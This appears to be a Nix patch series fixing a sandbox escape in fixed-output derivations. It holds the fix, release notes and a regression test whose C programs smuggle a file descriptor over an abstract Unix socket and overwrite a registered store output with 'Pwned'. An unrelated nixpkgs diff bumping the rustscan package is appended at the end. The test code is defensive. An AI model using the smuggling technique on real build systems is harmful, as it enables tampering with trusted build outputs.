+ test "$(cat ./result)" = "hello, world"
+ """.strip())
+ '';
+
+}
diff --git a/tests/nixos/ca-fd-leak/sender.c b/tests/nixos/ca-fd-leak/sender.c
new file mode 100644
index 000000000..75e54fc8f
--- /dev/null
+++ b/tests/nixos/ca-fd-leak/sender.c
@@ -0,0 +1,65 @@
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <stdlib.h>
+#include <stddef.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <string.h>
+#include <assert.h>
+
+int main(int argc, char **argv) {
+
+ assert(argc == 2);
+
+ int sock = socket(AF_UNIX, SOCK_STREAM, 0);
+
+ // Set up a abstract domain socket path to connect to.
+ struct sockaddr_un data;
+ data.sun_family = AF_UNIX;
+ data.sun_path[0] = 0;
+ strcpy(data.sun_path + 1, argv[1]);
+
+ // Now try to connect, To ensure we work no matter what order we are
+ // executed in, just busyloop here.
+ int res = -1;
+ while (res < 0) {
+ res = connect(sock, (const struct sockaddr *)&data,
+ offsetof(struct sockaddr_un, sun_path)
+ + strlen(argv[1])
+ + 1);
+ if (res < 0 && errno != ECONNREFUSED) perror("connect");
+ if (errno != ECONNREFUSED) break;
+ }
+
+ // Write our message header.
+ struct msghdr msg = {0};
+ msg.msg_control = malloc(128);
+ msg.msg_controllen = 128;
+
+ // Write an SCM_RIGHTS message containing the output path.
+ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
+ hdr->cmsg_len = CMSG_LEN(sizeof(int));
+ hdr->cmsg_level = SOL_SOCKET;
+ hdr->cmsg_type = SCM_RIGHTS;
+ int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640);
+ memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int));
+
+ msg.msg_controllen = CMSG_SPACE(sizeof(int));
+
+ // Write a single null byte too.
+ msg.msg_iov = malloc(sizeof(struct iovec));
+ msg.msg_iov[0].iov_base = "";
+ msg.msg_iov[0].iov_len = 1;
+ msg.msg_iovlen = 1;
+
+ // Send it to the othher side of this connection.
+ res = sendmsg(sock, &msg, 0);
+ if (res < 0) perror("sendmsg");
+ int buf;
+
+ // Wait for the server to close the socket, implying that it has
+ // received the commmand.
+ recv(sock, (void *)&buf, sizeof(int), 0);
+}
diff --git a/tests/nixos/ca-fd-leak/smuggler.c b/tests/nixos/ca-fd-leak/smuggler.c
new file mode 100644
index 000000000..82acf37e6
--- /dev/null
+++ b/tests/nixos/ca-fd-leak/smuggler.c
@@ -0,0 +1,66 @@
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <stdlib.h>
+#include <stddef.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <assert.h>
+
+int main(int argc, char **argv) {
+
+ assert(argc == 2);
+
+ int sock = socket(AF_UNIX, SOCK_STREAM, 0);
+
+ // Bind to the socket.
+ struct sockaddr_un data;
+ data.sun_family = AF_UNIX;
+ data.sun_path[0] = 0;
+ strcpy(data.sun_path + 1, argv[1]);
+ int res = bind(sock, (const struct sockaddr *)&data,
+ offsetof(struct sockaddr_un, sun_path)
+ + strlen(argv[1])
+ + 1);
+ if (res < 0) perror("bind");
+
+ res = listen(sock, 1);
+ if (res < 0) perror("listen");
+
+ int smuggling_fd = -1;
+
+ // Accept the connection a first time to receive the file descriptor.
+ fprintf(stderr, "%s\n", "Waiting for the first connection");
+ int a = accept(sock, 0, 0);
+ if (a < 0) perror("accept");
+
+ struct msghdr msg = {0};
+ msg.msg_control = malloc(128);
+ msg.msg_controllen = 128;
+
+ // Receive the file descriptor as sent by the smuggler.
+ recvmsg(a, &msg, 0);
+
+ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
+ while (hdr) {
+ if (hdr->cmsg_level == SOL_SOCKET
+ && hdr->cmsg_type == SCM_RIGHTS) {
+
+ // Grab the copy of the file descriptor.
+ memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int));
+ }
+
+ hdr = CMSG_NXTHDR(&msg, hdr);
+ }
+ fprintf(stderr, "%s\n", "Got the file descriptor. Now waiting for the second connection");
+ close(a);
+
+ // Wait for a second connection, which will tell us that the build is
+ // done
+ a = accept(sock, 0, 0);
+ fprintf(stderr, "%s\n", "Got a second connection, rewriting the file");
+ // Write a new content to the file
+ if (ftruncate(smuggling_fd, 0)) perror("ftruncate");
+ char * new_content = "Pwned\n";
+ int written_bytes = write(smuggling_fd, new_content, strlen(new_content));
+ if (written_bytes != strlen(new_content)) perror("write");
+}
From 8c27eb6c1bc490c9d2f3c7c1dedb1ca3c8e00759 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
<theophane.hufschmitt@tweag.io>
Date: Tue, 13 Feb 2024 08:28:02 +0100
Subject: [PATCH 2/4] Copy the output of fixed-output derivations before
registering them
It is possible to exfiltrate a file descriptor out of the build sandbox
of FODs, and use it to modify the store path after it has been
registered.
To avoid that issue, don't register the output of the build, but a copy
of it (that will be free of any leaked file descriptor).
---
src/libstore/build.cc | 11 +++++++++--
1 file changed, 9 insertions(+), 2 deletions(-)
diff --git a/src/libstore/build.cc b/src/libstore/build.cc
index d3a712c1a..3fb827a15 100644
--- a/src/libstore/build.cc
+++ b/src/libstore/build.cc
@@ -3286,10 +3286,17 @@ void DerivationGoal::registerOutputs()
throw BuildError(format("suspicious ownership or permission on '%1%'; rejecting this build output") % path);
#endif
- /* Apply hash rewriting if necessary. */
+ /* Apply hash rewriting if necessary.
+ *
+ * For FODs, we always do the dump-and-restore dance regardless to make
+ * sure that there's no stale file descriptor pointing to the output
+ * of the path.
+ * */
bool rewritten = false;
- if (!outputRewrites.empty()) {
+ if (fixedOutput || !outputRewrites.empty()) {
+ if (!outputRewrites.empty()) {
printError(format("warning: rewriting hashes in '%1%'; cross fingers") % path);
+ }
/* Canonicalise first. This ensures that the path we're
rewriting doesn't contain a hard link to /etc/shadow or
From 2064277b0566c361339d55fbbf46edbc2519f3b3 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
<7226587+thufschmitt@users.noreply.github.com>
Date: Wed, 21 Feb 2024 17:32:36 +0100
Subject: [PATCH 3/4] Fix a typo in a test comment
Co-authored-by: Valentin Gagarin <valentin.gagarin@tweag.io>
---
tests/nixos/ca-fd-leak/default.nix | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix
index c252caa4d..2fd5ca2d6 100644
--- a/tests/nixos/ca-fd-leak/default.nix
+++ b/tests/nixos/ca-fd-leak/default.nix
@@ -83,7 +83,7 @@ makeTest {
# Tell the smuggler server that we're done
machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}")
- # Check that the file was modified
+ # Check that the file was not modified
machine.succeed(r"""
cat ./result
test "$(cat ./result)" = "hello, world"
From 8604f6d32976fbdf84e46f75cbfa2446209b8a6b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
<theophane.hufschmitt@tweag.io>
Date: Fri, 1 Mar 2024 09:31:05 +0100
Subject: [PATCH 4/4] Add release notes
---
doc/manual/rl-next/fod-sandbox-escape.md | 14 ++++++++++++++
1 file changed, 14 insertions(+)
create mode 100644 doc/manual/rl-next/fod-sandbox-escape.md
diff --git a/doc/manual/rl-next/fod-sandbox-escape.md b/doc/manual/rl-next/fod-sandbox-escape.md
new file mode 100644
index 000000000..ed451711e
--- /dev/null
+++ b/doc/manual/rl-next/fod-sandbox-escape.md
@@ -0,0 +1,14 @@
+---
+synopsis: Fix a FOD sandbox escape
+issues:
+prs:
+---
+
+Cooperating Nix derivations could send file descriptors to files in the Nix
+store to each other via Unix domain sockets in the abstract namespace. This
+allowed one derivation to modify the output of the other derivation, after Nix
+has registered the path as "valid" and immutable in the Nix database.
+In particular, this allowed the output of fixed-output derivations to be
+modified from their expected content.
+
+This isn't the case any more.


@ -1,37 +1,52 @@
{ lib, rustPlatform, fetchCrate, nmap, stdenv, Security, perl, python3 }:
{
lib,
stdenv,
fetchFromGitHub,
nmap,
perl,
python3,
rustPlatform,
Security,
}:
rustPlatform.buildRustPackage rec {
pname = "rustscan";
version = "2.1.1";
version = "2.2.2";
src = fetchCrate {
inherit pname version;
sha256 = "sha256-yGVhbI1LivTIQEgqOK59T1+8SiTJBPIdftiXkwE4lZM=";
src = fetchFromGitHub {
owner = "RustScan";
repo = "RustScan";
rev = "refs/tags/${version}";
hash = "sha256-67XNEKzR72NOYlPbz2E9yf+THa1XN6muFJG2/iJa8AU=";
};
cargoSha256 = "sha256-UR3ktV80QU0N3f7qmqdhYpc5uwoPq4UvN40zEuMbp+Q=";
cargoHash = "sha256-U9Kn9xAG+emyi8cWUCNP32z7f19MK8AGgGR6vFJd62Q=";
postPatch = ''
substituteInPlace src/scripts/mod.rs \
--replace 'call_format = "nmap' 'call_format = "${nmap}/bin/nmap'
--replace-fail 'call_format = "nmap' 'call_format = "${nmap}/bin/nmap'
patchShebangs fixtures/.rustscan_scripts/*
'';
buildInputs = lib.optional stdenv.isDarwin Security;
nativeCheckInputs = [ perl python3 ];
nativeCheckInputs = [
perl
python3
];
# these tests require network access
checkFlags = [
# These tests require network access
"--skip=parse_correct_host_addresses"
"--skip=parse_hosts_file_and_incorrect_hosts"
];
meta = with lib; {
description = "Faster Nmap Scanning with Rust";
mainProgram = "rustscan";
homepage = "https://github.com/RustScan/RustScan";
changelog = "https://github.com/RustScan/RustScan/releases/tag/${version}";
license = licenses.gpl3Only;
maintainers = with maintainers; [ figsoda ];
mainProgram = "rustscan";
};
}